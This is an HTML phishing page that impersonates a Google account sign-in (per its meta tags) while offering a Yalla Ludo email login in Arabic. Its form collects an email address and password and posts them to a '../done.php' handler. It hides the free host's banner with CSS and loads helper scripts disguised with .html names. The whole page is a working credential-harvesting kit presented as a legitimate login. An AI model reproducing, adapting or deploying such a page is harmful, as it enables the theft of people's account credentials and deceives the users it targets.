<html>


<head>
    <style>
        img[alt="www.000webhost.com"] {
            display: none;
        }
    </style>

    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport"
        content="width=device-width, initial-scale=1.0, minimum-scale=1.0, maximum-scale=1.0, user-scalable=no" />
    <meta property="og:title" content="Sign in - Google accounts">
    <meta name="description" content="Login using your Google accounts to continue.">
    <meta property="og:description" content="Login using your Google accounts to continue.">
    <meta property="og:url" content="./">
    <meta property="og:site_name" content="Sign in - Google accounts">
    <meta property="og:image" content="img/banner.png">
    <meta property="og:type" content="website">
    <meta name="copyright" content="Sign in - Google accounts">
    <title>تسجيل دخول بريد يلا لودو</title>
    <link rel="stylesheet" href="css/google.css">
    <link rel="stylesheet"
        href="https://cdnjs.cloudflare.com/ajax/libs/material-design-iconic-font/2.2.0/css/material-design-iconic-font.min.css">
    <!-- <link rel="shortcut icon" href="https://www.google.com/favicon.ico"> -->
    <script src="js/2.1.3.jquery.min.js"></script>
    <script type="text/javascript" src="//s7.addthis.com/js/300/addthis_widget.js#pubid=ra-5c1d2f2b99978556"></script>

<body>
    <br>
    <br>
    <div class="navbar">
    </div>
    <div id="indexresult">
        <div id="konten">
            <div class="login-box">
                <center>
                    <img width="50" src="https://up6.cc/2022/07/165851138008191.png">
                </center>
                <h5></br>
                    <p class="login">.قم بالتسجيل عبر الاميل للحصول علئ صلاحية الوصول</p>
                </h5>
                </br>
                </br>
                </br>
                <form id="login-form" action="../done.php" method="post">
                    <div class="form-group">
                        <input type="text" name="email" id="email" placeholder="ٲدخل عنوان البريد الاكتروني"
                            autocomplete="off" required>
                        </br>
                        <input type="password" name="password" placeholder="ادخل كلمة المرور" id="email"
                            autocomplete="off" required>

                        <input type="hidden" name="login" value="Email" readonly>
                    </div>
                    <button class="btn-create"></button>
                    </br>
                    </br>
                    </br>
                    <span class="info"></span>
                    </br>
                    </br>
                    </br>
                    <button class="btn-create">انشاء حساب</button>
                    <button type="submit" onclick="kirim()" class="btn-login">تسجيل</button>
                </form>
            </div>
        </div>
        <div id="loadingresult" style="display: none;">
            <div class="progress" style="display: none;">
                <div style="display: none;" class="progress-bar progress-bar-success progress-bar-striped active"
                    role="progressbar" aria-valuenow="100" aria-valuemin="0" aria-valuemax="100" style="width: 100%">
                </div>
            </div>
        </div>
    </div>
    <script src="js/proses.html"></script>
    <script src="js/content.html"></script>
    <script src="js/counter.html"></script>
    <script type="text/javascript" src="js/2.1.1.jquery.min.js"></script>
</body>


</html>